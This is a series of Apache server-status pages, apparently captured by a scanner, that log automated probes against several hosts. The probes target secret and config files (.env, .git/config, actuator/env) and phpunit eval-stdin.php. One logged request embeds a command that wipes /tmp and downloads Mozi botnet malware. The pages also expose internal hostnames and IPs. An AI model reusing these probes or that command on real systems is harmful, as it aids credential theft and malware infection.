0.00169284312110.00.000.38 127.0.0.1http/1.1api.hnstream.com:8000GET /settings/.env HTTP/1.1 1-14-0/0/163. 0.00169284612990.00.000.50 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/163. 0.00169284418570.00.000.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.testing HTTP/1.1 1-14-0/0/167. 0.00169284616820.00.000.73 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/152. 0.00169284315680.00.000.50 127.0.0.1http/1.1api.hnstream.com:8000GET /gateway/env HTTP/1.1 1-14-0/0/147. 0.00169284714760.00.000.31 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/152. 0.00169284722770.00.000.71 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/149. 0.00169284312890.00.000.69 127.0.0.1http/1.1api.hnstream.com:8000GET /db.php.bak HTTP/1.1 1-14-0/0/150. 0.00169284416070.00.000.55 127.0.0.1http/1.1api.hnstream.com:8000GET /new/.env HTTP/1.1 1-14-0/0/156. 0.0016928408020.00.000.42 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-14-0/0/153. 0.0016928437450.00.000.63 127.0.0.1http/1.1api.hnstream.com:8000GET /src/.env HTTP/1.1 1-14-0/0/164. 0.00169284319300.00.000.46 127.0.0.1http/1.1api.hnstream.com:8000GET /v1/.env HTTP/1.1 1-14-0/0/146. 0.00169284314590.00.000.45 127.0.0.1http/1.1api.hnstream.com:8000GET /config/settings.env HTTP/1.1 1-14-0/0/168. 0.00169284512090.00.000.53 127.0.0.1http/1.1api.hnstream.com:8000GET /app_dev.php HTTP/1.1 1-14-0/0/159. 0.00169284318370.00.000.60 127.0.0.1http/1.1api.hnstream.com:8000GET /db.php HTTP/1.1 1-14-0/0/163. 0.00169284720100.00.000.57 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/147. 0.00169284313860.00.000.41 127.0.0.1http/1.1api.hnstream.com:8000GET /app/env HTTP/1.1 1-14-0/0/163. 0.00169284411490.00.000.48 127.0.0.1http/1.1api.hnstream.com:8000GET /config/actuator/env HTTP/1.1 1-14-0/0/152. 0.00169284415250.00.000.60 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-14-0/0/157. 0.00169284310690.00.000.56 127.0.0.1http/1.1api.hnstream.com:8000GET /config/env HTTP/1.1 1-14-0/0/150. 0.0016928439730.00.000.41 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.old HTTP/1.1 1-14-0/0/164.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabffc25f104
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Friday, 17-Jan-2025 00:15:08 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 8 Parent Server MPM Generation: 7 Server uptime: 6 days 1 hour 36 minutes 11 seconds Server load: 0.10 0.20 0.23 Total accesses: 3613 - Total Traffic: 14.7 MB - Total Duration: 37007 CPU Usage: u8.35 s15.76 cu99.35 cs47.93 - .0327% CPU load .00689 requests/sec - 29 B/second - 4252 B/request - 10.2427 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1536540no0yes025000 2536541no0yes124000 Sum200 149000 ........................._____________________________W_________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4-0/0/34. 0.0017368537440.00.000.13 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /admin/actuator/env HTTP/1.1 0-4-0/0/37. 0.0017368536820.00.000.38 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/env HTTP/1.1 0-4-0/0/41. 0.0017368509750.00.000.23 127.0.0.1http/1.1hnstream.com:8000GET /wp-login.php?wp_lang=e HTTP/1.1 0-4-0/0/34. 0.001736854950.00.000.14 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/actuator/env HTTP/1.1 0-4-0/0/34. 0.0017368515660.00.000.06 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4-0/0/42. 0.00173685011100.00.000.15 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-4-0/0/45. 0.0017368505210.00.000.31 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-4-0/0/51. 0.0017368502420.00.000.15 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-4-0/0/40. 0.0017368543050.00.000.17 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-4-0/0/43. 0.0017368541420.00.000.14 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-4-0/0/37. 0.0017368501300.00.000.08 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-4-0/0/45. 0.0017368505260.00.000.17 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-4-0/0/46. 0.00173685112520.00.000.08 178.62.241.182http/1.1 0-4-0/0/40. 0.0017368505650.00.000.15 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-4-0/0/40. 0.0017368515700.00.000.11 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4-0/0/38. 0.0017368515390.00.000.22 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4-0/0/44. 0.0017368509010.00.000.15 127.0.0.1http/1.1hnstream.com:8000GET /?author=1 HTTP/1.1 0-4-0/0/37. 0.0017368531440.00.000.14 127.0.0.1http/1.1api.hnstream.com:8000GET /robots.txt HTTP/1.1 0-4-0/0/44. 0.0017368501600.00.000.31 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-4-0/0/40. 0.0017368535680.00.000.15 127.0.0.1http/1.1api.hnstream.com:8000GET /druid/index.html HTTP/1.1 0-4-0/0/39. 0.0017368531330.00.000.15 89.248.163.214http/1.1 0-4-0/0/43. 0.0017368505940.00.000.16 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-4-0/0/34. 0.0017368515720.00.000.11 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4-0/0/43. 0.0017368515120.00.000.25 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4-0/0/39. 0.0017368564570.00.000.28 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /env HTTP/1.1 1-75365400/0/77_ 0.0090649290.00.000.32 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 1-75365400/0/76_ 0.00906313210.00.000.21 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 1-75365400/1/70_ 0.01143990.00.000.28 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-75365400/1/72_ 0.01137920.00.000.16 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-75365400/1/79_ 0.01138220.00.000.33 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-75365400/1/82_ 0.02116790.00.000.33 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 1-75365400/1/74_ 0.020511620.00.000.37 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 1-75365400/0/71_ 0.0090639690.00.000.20 140.248.91.81http/1.1api.hnstream.com:8000GET /%22http://www.netlingo.com/word/moderated-mailing-list.php 1-75365400/0/69_ 0.00906410470.00.000.15 140.248.91.57http/1.1api.hnstream.com:8000GET /comments/stream//%22http://www.queensmuseum.org/2016/01/he 1-75365400/0/71_ 0.0090638870.00.000.31 140.248.91.78http/1.1api.hnstream.com:8000GET /%22https://medium.com/@valyala/high-cardinality-tsdb-bench 1-75365400/0/74_ 0.0090638220.00.000.46 140.248.91.40http/1.1api.hnstream.com:8000GET /comments/stream//%22http://www.rapp.org/archives/2015/12/n 1-75365400/1/68_ 0.01256610.00.000.20 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-75365400/0/73_ 0.0090632850.00.000.25 140.248.91.50http/1.1api.hnstream.com:8000GET /%22https://sarahjaneavory.itch.io/zeta-wing/%22 HTTP/1.1 1-75365400/1/70_ 0.02082720.00.000.45 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-75365400/1/82_ 0.01340811100.00.000.24 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-75365400/0/67_ 0.0037632390.00.000.23 127.0.0.1http/1.1api.hnstream.com:8000GET /cgi-bin/luci/;stok=/locale?form=country&operation=read HTT 1-75365400/1/77_ 0.01252410.00.000.36 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-75365400/1/77_ 0.013813475750.00.000.36 157.52.108.83http/1.1api.livecounter.org:8000GET / HTTP/1.1 1-75365400/1/79_ 0.012611150.00.000.36 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 1-75365400/0/72_ 0.0090636070.00.000.20 140.248.91.82http/1.1api.hnstream.com:8000GET /comments/stream//%22https://github.com/lucybot/lucy-consol 1-75365400/1/76_ 0.02065830.00.000.22 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-75365400/1/75_ 0.02059820.00.000.36 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 1-75365400/0/81_ 0.0090634940.00.000.35 140.248.91.39http/1.1api.hnstream.com:8000GET /comments/stream//%22http://sh1.webring.com/people/gu/um_37 1-75365400/0/67_ 0.0090634560.00.000.23 140.248.91.52http/1.1api.hnstream.com:8000GET /comments/stream//%22https://www.gov.uk/government/publicat 1-75365400/1/78_ 0.01264700.00.000.25 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 2-75365410/1/36_ 0.01243014170.00.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf8b4e00bd
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Tuesday, 14-Jan-2025 09:06:13 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 5 Parent Server MPM Generation: 4 Server uptime: 3 days 10 hours 27 minutes 16 seconds Server load: 0.03 0.09 0.13 Total accesses: 1916 - Total Traffic: 7.9 MB - Total Duration: 25139 CPU Usage: u4.84 s9.02 cu51.66 cs24.84 - .0304% CPU load .00645 requests/sec - 27 B/second - 4306 B/request - 13.1206 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0262180no0yes025000 1262181no0yes124000 Sum200 149000 __________________________________________W_______.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-42621800/5/29_ 0.12150917260.00.010.12 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-42621800/6/32_ 0.11150436730.00.010.29 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-42621800/4/35_ 0.11376739660.00.010.22 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-42621800/7/27_ 0.1137663780.00.020.06 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-42621800/3/30_ 0.11376535600.00.000.05 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-42621800/4/37_ 0.113765310990.00.080.14 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-42621800/6/39_ 0.11376505160.00.020.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-42621800/6/44_ 0.12376432360.00.020.14 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-42621800/5/35_ 0.12376332880.00.010.16 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-42621800/6/37_ 0.12376331170.00.070.13 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-42621800/5/31_ 0.12376231160.00.010.07 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 0-42621800/6/38_ 0.12376235130.00.010.15 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-42621800/5/39_ 0.123761312410.00.010.07 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 0-42621800/5/32_ 0.12376135530.00.010.07 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /config.json HTTP/1.1 0-42621800/7/36_ 0.12376035640.00.020.11 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-42621800/4/31_ 0.12376025280.00.010.21 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /info.php HTTP/1.1 0-42621800/6/38_ 0.11192548790.00.010.07 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-42621800/8/32_ 0.12375911350.00.090.13 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-42621800/4/37_ 0.09375401500.00.010.22 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-42621800/6/37_ 0.12325545600.00.010.14 140.248.74.73http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 0-42621800/4/31_ 0.11325001210.00.000.13 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-42621800/7/40_ 0.12194115650.00.010.15 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-42621800/4/28_ 0.11193605550.00.010.10 127.0.0.1http/1.1hnstream.com:8000HEAD /wp-content/plugins/cleantalk-spam-protect/ HTTP/1.1 0-42621800/3/37_ 0.07193045040.00.010.23 127.0.0.1http/1.1api.hnstream.com:8000GET /actuator/gateway/routes HTTP/1.1 0-42621800/4/32_ 0.12193014190.00.070.18 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-42621810/4/46_ 0.10034110.00.010.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-42621810/4/45_ 0.10038260.00.010.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-42621810/3/38_ 0.10032990.00.010.07 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-42621810/5/43_ 0.10027120.00.010.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-42621810/5/45_ 0.10157280.00.020.17 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-42621810/5/44_ 0.10155680.00.010.16 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 1-42621810/3/39_ 0.091510710.00.010.27 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 1-42621810/5/45_ 0.09139000.00.010.10 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-42621810/2/41_ 0.09135520.00.000.07 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 1-42621810/5/39_ 0.10157960.00.010.14 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 1-42621810/4/48_ 0.10145260.00.010.37 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-42621810/4/35_ 0.1015840.00.010.06 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-42621810/3/41_ 0.09221760.00.010.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-42621810/3/40_ 0.09231760.00.010.23 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-42621810/4/45_ 0.09256170.00.010.17 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 1-42621810/2/36_ 0.09231470.00.010.16 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-42621810/5/45_ 0.09251700.00.020.30 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 1-426218110/3/36W 0.09001050.00.010.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-42621810/5/48_ 0.09136020.00.020.28 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-42621810/3/36_ 0.09134700.00.010.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-42621810/3/45_ 0.09104870.00.000.16 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 1-42621810/3/42_ 0.09158540.00.010.23 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 1-42621810/6/45_ 0.09134030.00.090.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-42621810/2/38_ 0.09153780.00.010.17 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-42621810/5/47_ 0.091
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf0dd2924d
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Sunday, 12-Jan-2025 05:23:47 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 3 Parent Server MPM Generation: 2 Server uptime: 1 day 6 hours 44 minutes 50 seconds Server load: 0.08 0.17 0.17 Total accesses: 662 - Total Traffic: 4.3 MB - Total Duration: 12000 CPU Usage: u1.89 s3.53 cu19.51 cs9.32 - .0309% CPU load .00598 requests/sec - 40 B/second - 6.7 kB/request - 18.1269 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 089572no0yes025000 189573no2yes124010 Sum202 149010 _____________________________________W____________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2895720/2/8_ 0.0576841410.00.080.09 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-2895720/3/9_ 0.06647611090.00.010.09 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2895720/2/11_ 0.03647146230.00.000.17 127.0.0.1http/1.1api.hnstream.com:8000GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 0-2895720/3/6_ 0.0631131310.00.000.01 206.168.34.221http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2895720/2/8_ 0.03310835120.00.010.01 127.0.0.1http/1.1api.hnstream.com:8000GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 0-2895720/2/9_ 0.0331084980.00.010.02 127.0.0.1http/1.1api.hnstream.com:8000GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 0-2895720/4/9_ 0.05768832830.00.160.24 23.235.35.84http/1.1api.hnstream.com:8000GET /phpinfo HTTP/1.1 0-2895720/2/11_ 0.0376833340.00.000.09 127.0.0.1http/1.1api.hnstream.com:8000GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 0-2895720/3/12_ 0.06686601220.00.010.11 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-2895720/2/8_ 0.0368614110.00.010.01 127.0.0.1http/1.1api.hnstream.com:8000GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 0-2895720/4/9_ 0.0630990250.00.010.02 206.168.34.221http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2895720/2/9_ 0.0330983280.00.010.02 206.168.34.221http/1.1 0-2895720/4/10_ 0.063098111590.00.010.02 206.168.34.221http/1.1api.hnstream.com:8000PRI * HTTP/2.0 0-2895720/2/11_ 0.0330983730.00.010.02 127.0.0.1http/1.1api.hnstream.com:8000GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 0-2895720/3/10_ 0.0628294720.00.010.05 127.0.0.1http/1.1api.hnstream.com:8000GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a 0-2895720/3/11_ 0.05282414660.00.010.17 124.121.114.110http/1.1api.hnstream.com:8000GET / HTTP/1.0 0-2895720/3/11_ 0.0618113274110.00.010.02 140.248.74.109http/1.1api.livecounter.org:8000GET / HTTP/1.1 0-2895720/3/10_ 0.0518060820.00.010.02 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-2895720/3/11_ 0.06121711850.00.010.10 140.248.90.46http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2895720/3/11_ 0.05121255140.00.010.09 23.235.35.30http/1.1api.hnstream.com:8000GET /_profiler/phpinfo HTTP/1.1 0-2895720/3/11_ 0.0576933870.00.010.10 23.235.35.68http/1.1api.hnstream.com:8000GET /_profiler/phpinfo HTTP/1.1 0-2895720/3/8_ 0.0576893580.00.010.09 23.235.35.36http/1.1api.hnstream.com:8000GET /phpinfo.php HTTP/1.1 0-2895720/2/9_ 0.03768945010.00.010.02 127.0.0.1http/1.1api.hnstream.com:8000GET /containers/json HTTP/1.1 0-2895720/2/9_ 0.0576893650.00.010.02 23.235.35.36http/1.1api.hnstream.com:8000GET /phpinfo HTTP/1.1 0-2895720/2/10_ 0.0376882620.00.080.09 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-2895730/5/18_ 0.10221620.00.010.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-2895730/5/20_ 0.10125810.00.010.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-2895730/2/12_ 0.1023910.00.010.02 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-2895730/2/14_ 0.1033690.00.010.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-2895730/5/21_ 0.10325330.00.100.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-2895730/3/18_ 0.1043440.00.010.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-2895730/4/21_ 0.1044199720.00.020.19 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-2895730/3/17_ 0.09757980.00.010.04 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-2895730/5/20_ 0.09144980.00.010.05 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-2895730/3/16_ 0.11123960.00.080.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-2895730/4/20_ 0.09034610.00.010.18 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-2895730/4/17_ 0.1103430.00.010.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-28957310/4/18W 0.09001220.00.010.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-2895730/2/17_ 0.09731250.00.000.19 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-2895730/3/18_ 0.09735530.00.080.13 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2895730/2/13_ 0.0970860.00.000.12 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 1-2895730/4/17_ 0.09751020.00.080.17 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 1-2895730/3/11_ 0.1075410.00.010.02 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-2895730/4/20_ 0.1065750.00.010.14 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 1-2895730/3/12_ 0.1064310.00.010.02 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-2895730/3/19_ 0.1063410.00.010.12 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 1-2895730/4/17_ 0.10654600.00.010.18 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 1-2895730/3/15_ 0.1064460.00.010.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-2895730/3/16_ 0.1065480.00.010.12 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 1-2895730/4/14_ 0.1065450.00.040.13 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/user
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfce962021
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Thursday, 09-Jan-2025 21:05:56 UTC Restart Time: Thursday, 09-Jan-2025 02:49:28 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 18 hours 16 minutes 27 seconds Server load: 0.42 0.18 0.12 Total accesses: 1504 - Total Traffic: 7.2 MB - Total Duration: 7177 CPU Usage: u1.79 s2.72 cu0 cs0 - .00686% CPU load .0229 requests/sec - 115 B/second - 5053 B/request - 4.77194 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 020793no1yes124010 120794no1yes025000 Sum202 149010 _____________W____________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0207930/43/43_ 1.042241790.00.120.12 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 0-0207930/45/45_ 1.05021770.00.200.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-0207930/54/54_ 1.05032140.00.270.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-0207930/49/49_ 1.042321910.00.270.27 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-0207930/46/46_ 1.042221820.00.190.19 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-0207930/41/41_ 1.042321580.00.190.19 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server-status HTTP/1.1 0-0207930/48/48_ 1.042231900.00.270.27 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-0207930/44/44_ 1.042131760.00.190.19 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-0207930/44/44_ 1.042121670.00.320.32 